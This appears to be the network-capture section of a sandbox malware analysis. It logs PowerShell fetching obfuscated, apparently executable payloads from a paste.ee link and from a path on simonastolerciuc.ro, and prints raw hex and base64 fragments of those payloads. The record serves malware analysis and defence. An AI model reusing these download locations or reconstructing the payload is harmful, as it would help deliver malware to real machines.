                                                    2024-10-07 05:09:03 UTC1369INData Raw: e2 86 93 3a e2 86 93 42 77 43 6e 4d 70 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 43 33 34 6e e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 44 e2 86 93 3a e2 86 93 49 58 32 67 30 57 45 77 51 72 4b 78 63 6f 4b 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 63 57 42 6d 38 72 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 62 79 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 42 51 67 47 45 51 55 58 62 79 30 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 6f 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 77 52 42 42 66 57 45 77 51 52 42 e2 86 93 3a e2 86 93 6b 78 30 e2 86 93 3a e2 86 93 67 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                                    Data Ascii: :BwCnMp:::KC34n:::KD:IX2g0WEwQrKxcoKg::CgcWBm8r:::Kbyw:::oTBQgGEQUXby0:::ooLg::CgwRBBfWEwQRB:kx0:gq:::
                                                    2024-10-07 05:09:03 UTC1093INData Raw: 86 93 3a e2 86 93 6f 6d 4b 67 e2 86 93 3a e2 86 93 62 4d e2 86 93 3a e2 86 93 55 e2 86 93 3a e2 86 93 6f 77 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 45 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 35 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 48 79 67 6f 4e 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6e 4c 7a e2 86 93 3a e2 86 93 77 42 77 4b 43 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 4b e2 86 93 3a e2 86 93 6f e2 86 93 3a e2 86 93 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 34 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a
                                                    Data Ascii: :omKg:bM:U:owQ:::Q::BEg::w::Cg5:::KHygoNw::CnLz:wBwKC4:::oK:o:L:::E:4:M::
                                                    2024-10-07 05:09:03 UTC1369INData Raw: 37 30 30 30 0d 0a 3a e2 86 93 48 e2 86 93 3a e2 86 93 57 46 68 55 6f 4d 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 59 47 4b 45 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 74 49 33 4b 62 42 67 42 77 42 6e 4c 4e e2 86 93 3a e2 86 93 77 42 77 4b 44 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 57 46 68 55 6f 4d 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 59 67 36 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 42 68 73 6f 45 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6e 4c 42 42 67 42 77 4b 44 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 4d 4b 45 4d e2 86 93 3a e2 86 93 e2 86
                                                    Data Ascii: 7000:H:WFhUoMw::CiYGKEI:::otI3KbBgBwBnLN:wBwKDI:::oWFhUoMw::CiYg6:M::Cgq:::KBhsoEQ::BnLBBgBwKDI:::oMKEM:
                                                    2024-10-07 05:09:03 UTC1369INData Raw: 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 67 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 49 49 67 54 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 4b 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6e 4e 4a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 45 77 55 6f 4e 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 74 31 4a 2f 2f 2f 2f e2 86 93 3a e2 86 93 42 45 46 45 77 34 52 44 69 68 4b e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 62 30 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 43 62 30 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 44 78 45 50 4b 42 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                                    Data Ascii: ::Cigx:::KIIgT:::oKg::CnNJ:::KEwUoNQ::Ct1J////:BEFEw4RDihK:::Kb0s:::oCb08:::oTDxEPKBU:::
                                                    2024-10-07 05:09:03 UTC1369INData Raw: e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 45 51 67 52 45 53 68 56 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4b 46 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 70 79 6f 77 63 e2 86 93 3a e2 86 93 63 e2 86 93 3a e2 86 93 68 79 7a 51 4d e2 86 93 3a e2 86 93 63 43 67 79 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 47 68 59 56 4b 44 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 6d 33 6b 34 6c 4b 44 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 45 69 67 54 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 42 6e 49 42 43 e2 86 93 3a e2 86 93 42 77 4b 43 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93
                                                    Data Ascii: :::oTEQgREShV:::KKFY:::pyowc:c:hyzQM:cCgy:::KGhYVKDM:::om3k4lKDQ:::oTEigT:::GBnIBC:BwKC4::


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.549709188.114.96.34433200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-07 05:09:08 UTC43OUTGET /d/P0BOw/0 HTTP/1.1
                                                    Host: paste.ee
                                                    2024-10-07 05:09:08 UTC1212INHTTP/1.1 200 OK
                                                    Date: Mon, 07 Oct 2024 05:09:08 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: max-age=2592000
                                                    strict-transport-security: max-age=63072000
                                                    x-frame-options: DENY
                                                    x-content-type-options: nosniff
                                                    x-xss-protection: 1; mode=block
                                                    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R6%2FBpHNA%2F%2FtYmcukKLSEPosn0DEqdHFJDhlM1uPJjDvAFLb3p8K0%2F4dMmrgBEb3AainP41sk5zo1Jt9j9Bo7vzSdExS%2BZkw%2FF5yNOQtyiu1gkIGlyAY%2B1gO9Vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8ceb60985daa438d-EWR
                                                    2024-10-07 05:09:08 UTC157INData Raw: 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2
                                                    Data Ascii: f7fTVqQ::M::::E:::://8::Lg::::::::
                                                    2024-10-07 05:09:08 UTC1369INData Raw: 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93
                                                    Data Ascii: :Q:::::::::::::::::::::::::::::::::::
                                                    2024-10-07 05:09:08 UTC1369INData Raw: 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 50 44 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 45 51 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                                    Data Ascii: :::::::::::::PDw::BL:::::::B:EQD::::::::::::
                                                    2024-10-07 05:09:08 UTC1079INData Raw: 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86
                                                    Data Ascii: :G:ucnNyYw:::::E::::::E:::Q:::DU:::::::::::::::
                                                    2024-10-07 05:09:08 UTC1369INData Raw: 32 30 30 30 0d 0a 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2
                                                    Data Ascii: 2000::::::::::::::::::::::::::::::::::::
                                                    2024-10-07 05:09:08 UTC1369INData Raw: e2 86 93 e2 86 93 3a e2 86 93 42 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 56 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4a 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 6c 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 65 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 43 e2 86 93 3a e2 86 93 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4f 49 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                                    Data Ascii: :BQ:::GE::::V::::Jg:::HU::::4lw:::Be::Q::BC:D::::OIw::
                                                    2024-10-07 05:09:08 UTC1369INData Raw: 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d 77 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 4b 67 4d 77 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2
                                                    Data Ascii: ::MwC::M:::::::::Dg::::::CgC:::GKgMwC::M:::::::::Dg:
                                                    2024-10-07 05:09:08 UTC1369INData Raw: 86 93 e2 86 93 3a e2 86 93 44 67 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 6a 6a 45 2f 2f 2f 2f 4f 75 66 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 7a 76 2f 2f 2f 7a 6a 58 2f 2f 2f 2f 4f 4b 44 2f 2f 2f 38 34 32 2f 2f 2f 2f 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d 77 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                                    Data Ascii: :Dgg::::KjjE////Ouf///8mI::::::4zv///zjX////OKD///842////w::::MwC::M:::::::::Dg:::
                                                    2024-10-07 05:09:08 UTC1369INData Raw: 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 66 67 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 55 2f 67 45 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 4d e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 34 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 4b 67 e2 86 93 3a
                                                    Data Ascii: :::Dg:::::fgQ:::QU/gEq:::DM:g:Cw:::::::::4:::::H4E:::EKg:
                                                    2024-10-07 05:09:08 UTC1355INData Raw: e2 86 93 3a e2 86 93 48 36 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 65 30 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 34 55 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 68 65 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4f 44 6e 2f 2f 2f 38 34 74 66 2f 2f 2f 7a 67 7a 2f 2f 2f 2f 4f 53 37 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 65 50 2f 2f 2f 7a 67 65 2f 2f 2f 2f 4f 68 6e 2f 2f 2f 38 6d 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 34 68 76 2f 2f 2f 7a 67
                                                    Data Ascii: :H6x:::Ee0s:::Q4Uw:::Dhe::::ODn///84tf///zgz////OS7///8mI::::::4eP///zge////Ohn///8mI::::::4hv///zg


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.54971085.120.16.934433200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-07 05:09:10 UTC86OUTGET /images/server.txt HTTP/1.1
                                                    Host: simonastolerciuc.ro
                                                    Connection: Keep-Alive
                                                    2024-10-07 05:09:10 UTC389INHTTP/1.1 200 OK
                                                    Connection: close
                                                    content-type: text/plain
                                                    last-modified: Fri, 04 Oct 2024 15:17:34 GMT
                                                    etag: "a1000-6700070e-0;;;"
                                                    accept-ranges: bytes
                                                    content-length: 659456
                                                    date: Mon, 07 Oct 2024 05:09:09 GMT
                                                    server: LiteSpeed
                                                    vary: User-Agent
                                                    referrer-policy: no-referrer-when-downgrade
                                                    access-control-allow-origin: *
                                                    pragma: public
                                                    cache-control: max-age=3600, public
                                                    2024-10-07 05:09:10 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAA
                                                    2024-10-07 05:09:10 UTC16384INData Raw: 41 41 41 41 34 41 51 41 41 41 41 50 65 77 44 41 37 38 38 4f 55 74 6a 51 37 4d 54 4f 31 6d 44 6d 35 73 59 4f 38 6c 44 57 35 49 56 4f 69 6b 7a 42 34 6b 4f 4f 66 6a 44 6d 34 77 48 4f 79 68 44 43 33 6b 2f 4e 30 66 7a 37 33 6f 36 4e 6c 65 6a 55 33 45 68 4e 36 62 54 75 32 73 71 4e 6c 61 7a 46 31 55 61 4e 67 57 54 6b 31 49 42 4e 32 54 44 30 30 73 4d 4e 46 4e 7a 71 7a 41 35 4d 4c 4f 44 64 7a 51 32 4d 70 4d 54 44 7a 67 67 4d 74 4c 7a 32 79 6f 73 4d 44 4c 54 74 79 77 71 4d 68 4b 7a 6c 79 77 6f 4d 43 4b 7a 63 79 41 6d 4d 76 49 7a 41 78 6f 66 4d 6b 48 7a 77 78 38 61 4d 51 47 54 67 78 63 57 4d 2f 45 44 4c 78 51 42 4d 6c 44 7a 33 77 49 48 4d 36 41 7a 4b 77 45 43 4d 50 41 7a 42 41 41 41 41 6f 43 41 41 77 44 77 50 7a 2f 54 79 2f 51 38 50 69 2b 7a 6c 2f 77 33 50 32 39 54
                                                    Data Ascii: AAAA4AQAAAAPewDA788OUtjQ7MTO1mDm5sYO8lDW5IVOikzB4kOOfjDm4wHOyhDC3k/N0fz73o6NlejU3EhN6bTu2sqNlazF1UaNgWTk1IBN2TD00sMNFNzqzA5MLODdzQ2MpMTDzggMtLz2yosMDLTtywqMhKzlywoMCKzcyAmMvIzAxofMkHzwx8aMQGTgxcWM/EDLxQBMlDz3wIHM6AzKwECMPAzBAAAAoCAAwDwPz/Ty/Q8Pi+zl/w3P29T
                                                    2024-10-07 05:09:10 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6e 58 65 61 2b 66 6b 52 61 38 2f 70 6d 36 32 2f 48 63 77 30 2f 2f 32 62 2f 2f 2f 33 66 2f 2f 2f 7a 4e 33 72 76 73 6b 53 65 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/nXea+fkRa8/pm62/Hcw0//2b///3f///zN3rvskSeMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                    2024-10-07 05:09:10 UTC16384INData Raw: 41 55 6b 6c 55 44 41 51 41 52 47 64 7a 42 6b 62 76 6c 47 64 77 56 32 59 34 56 32 58 6b 46 6d 59 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 31 41 41 41 51 41 52 47 64 7a 42 45 51 41 52 58 5a 30 46 47 64 7a 4a 57 54 66 56 46 52 45 42 45 64 32 4e 57 5a 6b 39 32 59 6b 38 6a 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4e 41 41 42 45 5a 30 4e 48 51 45 42 55 5a 77 6c 48 64 6a 52 79 50 57 46 30 50 75 41 41 41 41 41 41 41 46 5a 4a 31 41 41 41 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 6c 42 58 65 30 4e 57 56 42 39 6a 4c 41 41 41 41 41 41 51 52 57 53 4e 41 41 41 45 51 6b 52 33 63 41 56 32 63 68 4a 32 58 30 5a 33 59 6c 52 32 62 6a 5a 56 51 2f 34 43 41 41 41 41 41 41 55 6b 6c 55 44 41 41 41 41 45 51 6b 52 33 63 41 56 47 64 6c 78 57 5a 6b 39 31 64 6c 35 32
                                                    Data Ascii: AUklUDAQARGdzBkbvlGdwV2Y4V2XkFmYWF0PuAAAAAAAFZJ1AAAQARGdzBEQARXZ0FGdzJWTfVFREBEd2NWZk92Yk8jVB9jLAAAAAAQRWSNAABEZ0NHQEBUZwlHdjRyPWF0PuAAAAAAAFZJ1AAAAAAEQkR3cAV2chJ2XlBXe0NWVB9jLAAAAAAQRWSNAAAEQkR3cAV2chJ2X0Z3YlR2bjZVQ/4CAAAAAAUklUDAAAAEQkR3cAVGdlxWZk91dl52
